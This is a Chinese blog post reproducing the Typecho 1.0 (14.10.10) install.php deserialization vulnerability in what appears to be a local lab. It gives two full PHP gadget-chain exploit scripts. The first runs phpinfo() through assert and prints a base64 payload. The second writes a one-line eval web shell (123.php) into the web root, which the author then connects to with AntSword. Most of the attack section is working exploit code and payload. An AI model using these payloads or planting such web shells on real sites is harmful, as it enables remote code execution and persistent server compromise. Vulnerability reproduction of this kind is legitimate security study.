【漏洞复现】typecho_v1.0-14.10.10_unserialize

于 2023-11-05 13:49:09 发布
阅读量507 收藏
点赞数
分类专栏: # 漏洞复现 文章标签: 漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ZhaoSong_/article/details/134229445
版权

感谢互联网提供分享知识与智慧,在法治的社会里,请遵守有关法律法规

文章目录

下载链接:https://pan.baidu.com/s/1z0w7ret-uXHMuOZpGYDVlw
提取码:lt7a

首页

在这里插入图片描述

漏洞点:/install.php?finish=

漏洞利用

漏洞利用脚本 phpinfo()信息

<?php
     //typecho_1.0(14.10.10)_unserialize_phpinfo.php
class Typecho_Feed{
	const RSS1 = 'RSS 1.0';
	const RSS2 = 'RSS 2.0';
	const ATOM1 = 'ATOM 1.0';
   	const DATE_RFC822 = 'r';
	const DATE_W3CDTF = 'c';
	const EOL = "\n";
	private $_type;
	private $_items;
	
	public function __construct(){
		$this->_type = $this::RSS2;
		$this->_items[0] = array(
			'title' => '1',
			'link' => '1',
			'date' => 1508895132,
			'category' => array(new Typecho_Request()),
			'author' => new Typecho_Request(),
		);
	}
}

class Typecho_Request{
	private $_params = array();
	private $_filter = array();

	public function __construct(){
		$this->_params['screenName'] = 'phpinfo()';
		$this->_filter[0] = 'assert';
    }
}

$exp = array(
	'adapter' => new Typecho_Feed(),
	'prefix' => 'typecho_'
);

echo base64_encode(serialize($exp));
?>

在这里插入图片描述

得到base64编码后的结果

YToyOntzOjc6ImFkYXB0ZXIiO086MTI6IlR5cGVjaG9fRmVlZCI6Mjp7czoxOToiAFR5cGVjaG9fRmVlZABfdHlwZSI7czo3OiJSU1MgMi4wIjtzOjIwOiIAVHlwZWNob19GZWVkAF9pdGVtcyI7YToxOntpOjA7YTo1OntzOjU6InRpdGxlIjtzOjE6IjEiO3M6NDoibGluayI7czoxOiIxIjtzOjQ6ImRhdGUiO2k6MTUwODg5NTEzMjtzOjg6ImNhdGVnb3J5IjthOjE6e2k6MDtPOjE1OiJUeXBlY2hvX1JlcXVlc3QiOjI6e3M6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX3BhcmFtcyI7YToxOntzOjEwOiJzY3JlZW5OYW1lIjtzOjk6InBocGluZm8oKSI7fXM6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX2ZpbHRlciI7YToxOntpOjA7czo2OiJhc3NlcnQiO319fXM6NjoiYXV0aG9yIjtPOjE1OiJUeXBlY2hvX1JlcXVlc3QiOjI6e3M6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX3BhcmFtcyI7YToxOntzOjEwOiJzY3JlZW5OYW1lIjtzOjk6InBocGluZm8oKSI7fXM6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX2ZpbHRlciI7YToxOntpOjA7czo2OiJhc3NlcnQiO319fX19czo2OiJwcmVmaXgiO3M6ODoidHlwZWNob18iO30

​ 请求体参数是__typecho_config=,上面base64编码后的结果就是该参数的值

在这里插入图片描述

GetShell

payload如下:

<?php
    //typecho_1.0(14.10.10)_unserialize_GetShell.php
class Typecho_Request
{
    private $_params = array();
    private $_filter = array();

    public function __construct()
    {
        $this->_params['screenName'] = 'file_put_contents(\'123.php\',\'<?php @eval($_POST[shell]);?>\')';
        $this->_filter[0] = 'assert';
    }
}

class Typecho_Feed
{
    private $_type;
    private $_items = array();
    public $dateFormat;

    public function __construct()
    {
        $this->_type = 'ATOM 1.0';
        $item['author'] = new Typecho_Request();
        $this->_items[0] = $item;
    }
}

$x = new Typecho_Feed();
$a = array(
    'adapter' => $x,
    'prefix' => 'typecho_'
);
echo "<pre>";
print_r($a);
echo "</pre>";
echo serialize($a)."<br>";
echo "__typecho_config=".base64_encode(serialize($a));
?>

在这里插入图片描述

http://192.168.80.140/typecho_1.0(14.10.10)/build/install.php?finish=

传递post参数__typecho_config

在这里插入图片描述

点击执行,返回 状态码500

在这里插入图片描述

这个时候在网站的根目录下生成一个123.php一句话木马文件

在这里插入图片描述

浏览器访问一下这个123.php文件

然后使用蚁剑连接

在这里插入图片描述

过期的秋刀鱼-
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
typecho1.0.14.10.10
10-30
Typecho 1.0.14.10.10:开源博客系统深度解析》 Typecho,作为一款简洁而强大的开源博客平台,深受众多技术爱好者和博主的喜爱。Typecho 1.0.14.10.10 是其在2014年10月发布的一个稳定版本,具有多项改进和优化,...
typecho-1.1-15.5.12-beta.zip
03-17
本文将详细探讨“typecho-1.1-15.5.12-beta.zip”压缩包中的Typecho 1.1版本至15.5.12 Beta版本中存在的反序列化漏洞,以帮助读者理解这一安全隐患及其可能的影响,并提供防范措施。 Typecho是一款开源的轻量级博客...
typecho_1.0_14.10.10_反序列化_漏洞
weixin_42786460的博客
09-10 221
typecho_1.0_14.10.10_反序列化_漏洞
typecho_1.0_14.10.10_unserialize
weixin_43886198的博客
12-21 767
typecho_1.0_14.10.10_unserialize 漏洞描述 typecho 是博客CMS,前台install.php 文件存在反序列化漏洞,通过构造的反序列化字符串注入可以执行任意PHP 代码。 漏洞危害等级 高危 影响版本 typecho1.0(14.10.10) 漏洞复现 基础环境 组件 版本 OS Win10 Webserver MAMP PRO _PHP5.6.37 typecho 1.0(14.10.10) 网站安装 需要进入数据库创建一个typ
PHP序列化-Typecho框架漏洞-任意代码执行
告白的博客
08-10 517
0x00 漏洞框架介绍 typecho框架存在反序列化漏洞,利用此漏洞可执行任意代码 0x01 漏洞复现 环境搭建 创建数据库–create database typecho; 漏洞Typecho框架漏洞-任意代码执行----- POC: YToyOntzOjc6ImFkYXB0ZXIiO086MTI6IlR5cGVjaG9fRmVlZCI6Mjp7czoxOToiAFR5cGVjaG9fRmVlZABfdHlwZSI7czo3OiJSU1MgMi4wIjtzOjIwOiIAVHlwZWNob
CVE-2018-18753 Typecho 漏洞复现分析
OceanSJ的博客
02-17 463
找到unserialize()函数;验证_typecho_config参数可控;追踪对象$db发现了Magic方法并跟踪至敏感函数call_user_func()
漏洞分析之Typecho二连爆
hl1293348082的专栏
04-04 1955
这段时间 Typecho 在十几天之内连续爆了两个最高可 getshell 的洞,先是 SSRF 可打内网,再是反序列化直接前台 getshell ……安全性这方面堪忧…… 跟着师傅们的文章,简单地分析一下这两次漏洞,第二个反序列化的洞的溯源思路值得学习一波~ 虽然很多大号都分析过这个漏洞,写的也很详细,我作为一个初学者自己分析学习一下也是很有必要的,官方人员已经对这些漏洞进行的及时的修补并且推出了最新的版本,如果有用到这个博客的同学赶紧升级。 Typecho 1.0 (14.10.10) —— SS
typecho_14.10.10反序列化漏洞复现
acdcccc的博客
09-05 116
typecho_14.10.10反序列化漏洞复现
Leisure-master.zip_QBB_leisure_typecho_typecho master
09-24
《Leisure-master.zip_QBB_leisure_typecho_typecho master》是一个与Typecho博客平台相关的主题文件,其中包含的"Leisure-master"是该主题的核心部分。Typecho是一款轻量级的开源博客系统,以其简洁、高效和易于...
typecho1.1-17.10.30-release.tar
01-18
typecho官方的最新版的一键搭建模板,只需要PHP+MYSQL环境即可搭建完成。
clean-home.zip_Home Home_typecho
09-23
《Clean Home:打造优雅的Typecho博客主题》 在互联网世界中,博客作为一个个人或团队表达观点、分享知识的重要平台,其设计与布局对于吸引读者、提升用户体验具有至关重要的作用。Typecho是一款轻量级、易用且强大...
Caché数据库及其特性.pdf
07-19
本文对Caché数据库相关概念、架构、前景、特性、实现及应用进行了简洁的介绍和阐述,并用较大篇幅对Caché数据库独一无二的架构设计和特性实现进行了详细的说明和解释,期间,结合实例对相关概念和知识进行了解析,以期各位同学对该数据库进行初步了解和学习,为进一步深入学习和掌握打下良好的基础。
使用Richardson-Lucy反褶积的压缩光场显微镜(SLIM)3D重建Matlab代码.rar
07-19
1.版本:matlab2014/2019a/2021a 2.附赠案例数据可直接运行matlab程序。 3.代码特点:参数化编程、参数可方便更改、代码编程思路清晰、注释明细。 4.适用对象:计算机,电子信息工程、数学等专业的大学生课程设计、期末大作业和毕业设计。 5.作者介绍:某大厂资深算法工程师,从事Matlab算法仿真工作10年;擅长智能优化算法、神经网络预测、信号处理、元胞自动机等多种领域的算法仿真实验,更多仿真源码、数据集定制私信+。 替换数据可以直接使用,注释清楚,适合新手
Java集合框架学习xmind文件①
最新发布
07-19
Java基础学习、集合框架
基于Springboot的自习室管理和预约系统设计与实现论文
07-19
传统信息管理方式存在显著不足,首先耗时较长,其次数据错误率较高,且错误数据更正难度大,最后数据检索过程也颇为繁琐费力。因此,引入自习室管理和预约系统软件,旨在发挥其高效信息处理的能力,以优化信息管理流程,使管理工作更加系统化和程序化。同时,该系统的有效运用还能助力管理人员准确快速地处理信息。 在开发自习室管理和预约系统时,我们对于开发工具的选择尤为谨慎。为了便于开发与实现,我们选择了IDEA作为开发工具,并采用Mysql作为数据库工具。以此为基础搭建的开发环境,成功实现了自习室管理和预约系统的多项功能,包括管理员对用户和新闻公告的管理。 自习室管理和预约系统是一款基于软件开发技术精心打造的应用系统,它在信息处理方面展现出卓越的性能。无论是数据添加、数据维护与统计,还是数据查询等处理需求,该系统都能轻松胜任,展现出其强大的处理能力。
【故障诊断】基于非洲秃鹫优化算法AVOA优化长短记忆网络LSTM实现故障诊断附matlab代码.rar
07-19
1.版本:matlab2014/2019a/2021a 2.附赠案例数据可直接运行matlab程序。 3.代码特点:参数化编程、参数可方便更改、代码编程思路清晰、注释明细。 4.适用对象:计算机,电子信息工程、数学等专业的大学生课程设计、期末大作业和毕业设计。 5.作者介绍:某大厂资深算法工程师,从事Matlab算法仿真工作10年;擅长智能优化算法、神经网络预测、信号处理、元胞自动机等多种领域的算法仿真实验,更多仿真源码、数据集定制私信+。 替换数据可以直接使用,注释清楚,适合新手
《AI大模型应用》--Vote the Best LLM by yourself! 票选你最喜欢的大语言模型.zip
07-19
个人深耕AI大模型应用领域积累的成果,希望对您有所帮助。有大模型账号、环境问题、AI大模型技术应用落地方案等相关问题,欢迎详聊,能为您解决问题是我的荣幸! 个人深耕AI大模型应用领域积累的成果,希望对您有所帮助。有大模型账号、环境问题、AI大模型技术应用落地方案等相关问题,欢迎详聊,能为您解决问题是我的荣幸! 个人深耕AI大模型应用领域积累的成果,希望对您有所帮助。有大模型账号、环境问题、AI大模型技术应用落地方案等相关问题,欢迎详聊,能为您解决问题是我的荣幸! 个人深耕AI大模型应用领域积累的成果,希望对您有所帮助。有大模型账号、环境问题、AI大模型技术应用落地方案等相关问题,欢迎详聊,能为您解决问题是我的荣幸! 个人深耕AI大模型应用领域积累的成果,希望对您有所帮助。有大模型账号、环境问题、AI大模型技术应用落地方案等相关问题,欢迎详聊,能为您解决问题是我的荣幸!
【信号分解】基于豪猪优化算法CPO-CEEMDAN实现信号去躁附matlab代码.rar
07-19
1.版本:matlab2014/2019a/2021a 2.附赠案例数据可直接运行matlab程序。 3.代码特点:参数化编程、参数可方便更改、代码编程思路清晰、注释明细。 4.适用对象:计算机,电子信息工程、数学等专业的大学生课程设计、期末大作业和毕业设计。 5.作者介绍:某大厂资深算法工程师,从事Matlab算法仿真工作10年;擅长智能优化算法、神经网络预测、信号处理、元胞自动机等多种领域的算法仿真实验,更多仿真源码、数据集定制私信+。 替换数据可以直接使用,注释清楚,适合新手
docker-compose安装typecho
08-24
要在Docker中使用docker-compose安装Typecho,您可以按照以下步骤进行操作: 步骤1:创建一个新目录,并在其中创建一个名为`docker-compose.yml`的文件。 步骤2:在`docker-compose.yml`文件中添加以下内容: ```yaml version: '3' services: db: image: mysql:5.7 restart: always environment: MYSQL_ROOT_PASSWORD: your_mysql_root_password MYSQL_DATABASE: typecho MYSQL_USER: typecho MYSQL_PASSWORD: your_typecho_db_password typecho: image: typecho/typecho:latest restart: always ports: - 80:80 depends_on: - db environment: MYSQL_HOST: db MYSQL_PORT: 3306 MYSQL_DATABASE: typecho MYSQL_USER: typecho MYSQL_PASSWORD: your_typecho_db_password ``` 请确保将`your_mysql_root_password`和`your_typecho_db_password`替换为您自己的密码。 步骤3:保存文件并在命令行中导航到包含`docker-compose.yml`文件的目录。 步骤4:运行以下命令来启动Typecho容器: ```bash docker-compose up -d ``` 这将下载Typecho和MySQL的镜像,并在后台启动容器。 步骤5:等待一段时间,然后在浏览器中访问`http://localhost`即可开始Typecho的安装过程。 请注意,如果您希望通过其他端口访问Typecho,请修改`docker-compose.yml`文件中的端口映射。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

过期的秋刀鱼-

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值